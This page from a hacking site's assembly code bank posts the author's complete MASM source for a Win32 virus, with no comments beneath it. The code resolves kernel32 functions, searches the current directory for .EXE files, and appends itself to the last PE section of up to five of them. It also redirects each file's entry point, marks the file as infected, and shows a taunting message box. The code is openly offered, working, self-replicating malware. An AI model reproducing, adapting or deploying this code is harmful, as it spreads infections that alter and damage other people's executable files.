Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.
Win32 Virus - Assembly Code Bank
Win32 Virus
My little win32 virus, that infects .exe files in directory
Compiler--MASM
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
VirusSize equ (offset VirusEnd - offset VirusStart)
.data
OurTitle db "Message",0
OurMessage db "This Is [Win32] Virus",10
db " by EdoVt",0
.code
VirusStart label byte
start:
nop
nop
pushad
pushfd
call delta
delta:
pop ebp
sub ebp,offset delta;; ebp=delta offset
mov eax,[esp+24h];;eax==somewhere in Kernel32( CreateProcess)
call FuckTheK32
call GetAPIz
call Infect
or ebp,ebp
jz @1stGen;;;;;;First Generetion
;;WE Can Fuck This File
;;;Call Of LoadLibrary API
lea eax,[USER32DLL+ebp]
push eax
call [ebp+_LoadLibraryA]
;;;End Call eax==user32.dll handle
;;;Call of GetProcAddress
lea ecx,[MESSAGEBOX+ebp]
push ecx
push eax
call [ebp+_GetProcAddress]
;;;;End Call Eax==MessageBoxA Address
;;;MessageBoxA Call
xor ebx,ebx
push ebx
lea ecx,[MesTitle+ebp]
push ecx
lea ecx,[Mess+ebp]
push ecx
push ebx
call eax
popfd
popad
mov eax,12345678h
org $-4
ImageBase dd 400000h
add eax,12345678h
org $-4
EntryPoint dd 1000h
jmp eax
;;return to the host
push 0
call ExitProcess
Infect:
and [ebp+Infections],00000000h
lea eax,[@WinFindData+ebp]
push eax
lea eax,[SearchMask+ebp]
push eax
call [ebp+_FindFirstFileA]
inc eax
or eax,eax
jz FailInfect
dec eax
mov [ebp+SearchHandle],eax
InfectIt:
push [ebp+EntryPoint]
push [ebp+ImageBase]
call Infection
pop [ebp+ImageBase]
pop [ebp+EntryPoint]
inc [ebp+Infections]
cmp [ebp+Infections],5
jz CloseSearchHandle
;;;;;;;;Its All Right
nop
lea edi,[@WinFindData.cFileName+ebp]
mov ecx,MAX_PATH
xor al,al
rep stosb
lea eax,[ebp+@WinFindData]
push eax
push dword ptr [ebp+SearchHandle]
call [ebp+_FindNextFileA]
or eax,eax
jnz InfectIt
CloseSearchHandle:
push [ebp+SearchHandle]
call [ebp+_FindClose]
FailInfect:
ret
Infection:
lea esi,dword ptr[ebp+@WinFindData.cFileName]
push 80h
push esi
call [ebp+_SetFileAttributesA]
call @OpenFile
inc eax
or eax,eax
jz CantOpen
dec eax;;eax==Current File handle
mov [ebp+FileHandle],eax
xor ecx,ecx
call CreateMap
or eax,eax
jz CloseFile
mov [ebp+MapHandle],eax
mov ecx,[ebp+@WinFindData.nFileSizeLow]
call MapFile
or eax,eax
jz CloseMap
mov [ebp+MapAddress],eax
mov esi,[eax+3ch]
add esi,eax;;;;;PE header in esi
mov eax,esi
cmp word ptr[eax],'EP'
jnz NoInfect
;;;Yeah its PE file
cmp dword ptr [eax-04h],'nooM';;;Is File Infected
jz NoInfect
push dword ptr [eax+3ch]
push dword ptr [ebp+MapAddress]
call [ebp+_UnmapViewOfFile]
push dword ptr [ebp+MapHandle]
call [ebp+_CloseHandle]
pop ecx;;;File ALign
mov eax,[ebp+@WinFindData.nFileSizeLow]
add eax,VirusSize
call @@Align
mov [ebp+NewSize],eax
xchg ecx,eax
call CreateMap
or eax,eax
jz CloseFile
mov [ebp+MapHandle],eax
mov ecx,[ebp+NewSize]
call MapFile
or eax,eax
jz CloseMap
mov [ebp+MapAddress],eax
mov esi,[eax+3ch]
add esi,eax;;;;;PE header in esi
mov edi,esi
add esi,78h;;Pointer to Directory table
mov edx,[edi+74h];;Number of directories
shl edx,3
add esi,edx;;Pointer to 1st section
movzx eax,word ptr [edi+06h]
dec eax
imul eax,eax,28h
add esi,eax;;;;esi =====pointer to last the section
mov eax,dword ptr[edi+28h];;;EntryPoint in eax
mov dword ptr[ebp+EntryPoint],eax
mov eax,dword ptr[edi+34h]
mov dword ptr[ebp+ImageBase],eax
mov edx,dword ptr[esi+10h];;Sizeofrawdata
mov ebx,edx
add edx,dword ptr[esi+14h];;edx=edx+Pointer to raw data
push edx
mov eax,dword ptr[esi+0ch];;eax===last section RVA
add eax,ebx;;;;NewEIP
mov dword ptr [ebp+OurEntryPoint],eax;;;New ENtryPoint
mov dword ptr[edi+28h],eax;;Set New EntryPoint
mov eax,dword ptr[esi+10h];;Size of raw data
add eax,VirusSize
push eax
mov ecx,[edi+3ch]
call @@Align
mov dword ptr[esi+10h],eax;;;New Size of raw data
mov ecx,[edi+038h]
pop eax
call @@Align
shl eax,1
mov dword ptr[esi+08h],eax;;New Virtual Size
pop edx;;;;edx=SizeOfRawData+Pointer to raw data
add eax,dword ptr[esi+0Ch];;eax=eax+RVA(Last Section)
mov dword ptr[edi+50h],eax;;;New SizeOfImage
or dword ptr [esi+24h],0A0000020h;;;New attributes for last section
mov dword ptr [edi-04h],"nooM";;Our LOGO
lea esi,[ebp+start]
mov edi,edx
add edi,[ebp+MapAddress];;;edi=Pointer to place where go our virus
mov ecx,VirusSize
rep movsb
push dword ptr [ebp+MapAddress]
call [ebp+_UnmapViewOfFile]
jmp CloseMap
NoInfect:
dec word ptr [ebp+Infections]
CloseMap:
push dword ptr [ebp+MapHandle]
call [ebp+_CloseHandle]
CloseFile:
push dword ptr [ebp+FileHandle]
call [ebp+_CloseHandle]
CantOpen:
push dword ptr [ebp+@WinFindData.dwFileAttributes]
lea eax,[ebp+@WinFindData.cFileName]
push eax
call [ebp+_SetFileAttributesA]
ret
@@Align proc
xor edx,edx
push eax
div ecx
pop eax
or edx,edx
jz Enough
sub ecx,edx
add eax,ecx
Enough: ret
@@Align endp
MapFile proc
xor eax,eax
push ecx
push eax
push eax
push 02h
push [ebp+MapHandle]
call [ebp+_MapViewOfFile]
ret
MapFile endp
CreateMap proc
xor eax,eax
push eax
push ecx
push eax
push 04h
push eax
push [ebp+FileHandle]
call [ebp+_CreateFileMappingA]
ret
CreateMap endp
@OpenFile proc;;esi=pointer to the file name
xor eax,eax
push eax
push eax
push 03h
push eax
push 01h
push 80000000h or 40000000h
push esi
call [ebp+_CreateFileA]
ret
@OpenFile endp
FuckTheK32 proc;;eax==somewhere in Kernel32( CreateProcess)
@loop:
cmp word ptr [eax],"ZM";;Is It MZ header
jz WeGotK32MZ
dec eax;
jmp @loop;;loop
WeGotK32MZ:
mov [Kernel_MZ+ebp],eax
add eax,3ch;;[eax] === PE header offset
mov eax,[eax];;eax===PE header offset
add eax,[ebp+Kernel_MZ];;;Normalize
cmp word ptr [eax],"EP"
jz WeGotK32
;;;Call of ExitProcess
push 0
call ExitProcess
WeGotK32:
cld
mov [Kernel_PE+ebp],eax
mov esi,eax;;esi=Kernel_PE
add esi,78h
lodsd;;;; eax=RVA of Export Table
add eax,[Kernel_MZ+ebp];;;Normalize
mov esi,eax
add esi,1ch
lodsd;;;eax==RVA of Export Address table
add eax,[Kernel_MZ+ebp];;Normalize that
mov [ExpAddrTableVA+ebp],eax;;Keeping
lodsd;;eax==RVA of Export Names pointer table
add eax,[Kernel_MZ+ebp];;Normalizing
mov [ExpNameTableVA+ebp],eax
lodsd
add eax,[Kernel_MZ+ebp]
mov [ExpOrdinalTableVA+ebp],eax
ret
FuckTheK32 endp
;;;;;;;;;;;;;;;;;Function to Get the APIs Addressis
GetAPIz proc
cld
lea ebx,[OurAPIz+ebp]
lea edi,[OurFuncz+ebp]
begin:
push edi
mov [Counter+ebp],0
xor ecx,ecx
mov esi,ebx
@_1: lodsb
inc ecx
or al,al
jnz @_1
mov edx,ecx
mov edi,ebx
mov esi,[ExpNameTableVA+ebp]
push esi
@_2:lodsd
mov esi,eax
add esi,[Kernel_MZ+ebp]
repe cmpsb
jz TheyAreEqual
pop esi
add esi,4
push esi
mov edi,ebx
mov ecx,edx
inc word ptr [Counter+ebp]
jmp @_2
TheyAreEqual:
pop esi
pop edi
xor esi,esi
add ebx,edx
xor eax,eax
mov si,[Counter+ebp]
shl esi,1
add esi,[ExpOrdinalTableVA+ebp]
lodsw
mov esi,eax
shl esi,2
add esi,[ExpAddrTableVA+ebp]
lodsd
add eax,[Kernel_MZ+ebp]
stosd
cmp dword ptr [ebx],"jreV"
jnz begin
ret
GetAPIz endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Functions End
Infections db 0
OurEntryPoint dd 1000h
Counter dw 0
USER32DLL db "user32.dll",0
MESSAGEBOX db "MessageBoxA",0
MesTitle db "Got Ya !!!!!!!!!!!!!",0
Mess db "Everything under the sun is in tune,",10
db "But the sun is eclipsed by the MOON.",10
db " Pink Floyd",10,10
db "This File Is Infected By ",0
SearchMask db '*.EXE',0
OurAPIz label byte
@FindFirstFileA db "FindFirstFileA",0
@FindNextFileA db "FindNextFileA",0
@FindClose db "FindClose",0
@CloseHandle db "CloseHandle",0
@CreateFileA db "CreateFileA",0
@SetFilePointer db "SetFilePointer",0
@SetFileAttributesA db "SetFileAttributesA",0
@CreateFileMappingA db "CreateFileMappingA",0
@MapViewOfFile db "MapViewOfFile",0
@UnmapViewOfFile db "UnmapViewOfFile",0
@SetEndOfFile db "SetEndOfFile",0
@LoadLibraryA db "LoadLibraryA",0
@GetProcAddress db "GetProcAddress",0
db "Verj",0
VirusEnd label byte
OurFuncz label byte
_FindFirstFileA dd 0
_FindNextFileA dd 0
_FindClose dd 0
_CloseHandle dd 0
_CreateFileA dd 0
_SetFilePointer dd 0
_SetFileAttributesA dd 0
_CreateFileMappingA dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_SetEndOfFile dd 0
_LoadLibraryA dd 0
_GetProcAddress dd 0
@WinFindData WIN32_FIND_DATA <>
SearchHandle dd ?
FileHandle dd ?
MapHandle dd ?
MapAddress dd ?
NewSize dd ?
OurDelta dd ?
HostStart dd ?
Kernel_MZ dd ?
Kernel_PE dd ?
ExpAddrTableVA dd ?
ExpNameTableVA dd ?
ExpOrdinalTableVA dd ?
@1stGen:
popfd
popad
xor eax,eax
push eax
push offset OurTitle
push offset OurMessage
push eax
call MessageBoxA
push 0
call ExitProcess
end start
ghostComments
Sorry but there are no comments to display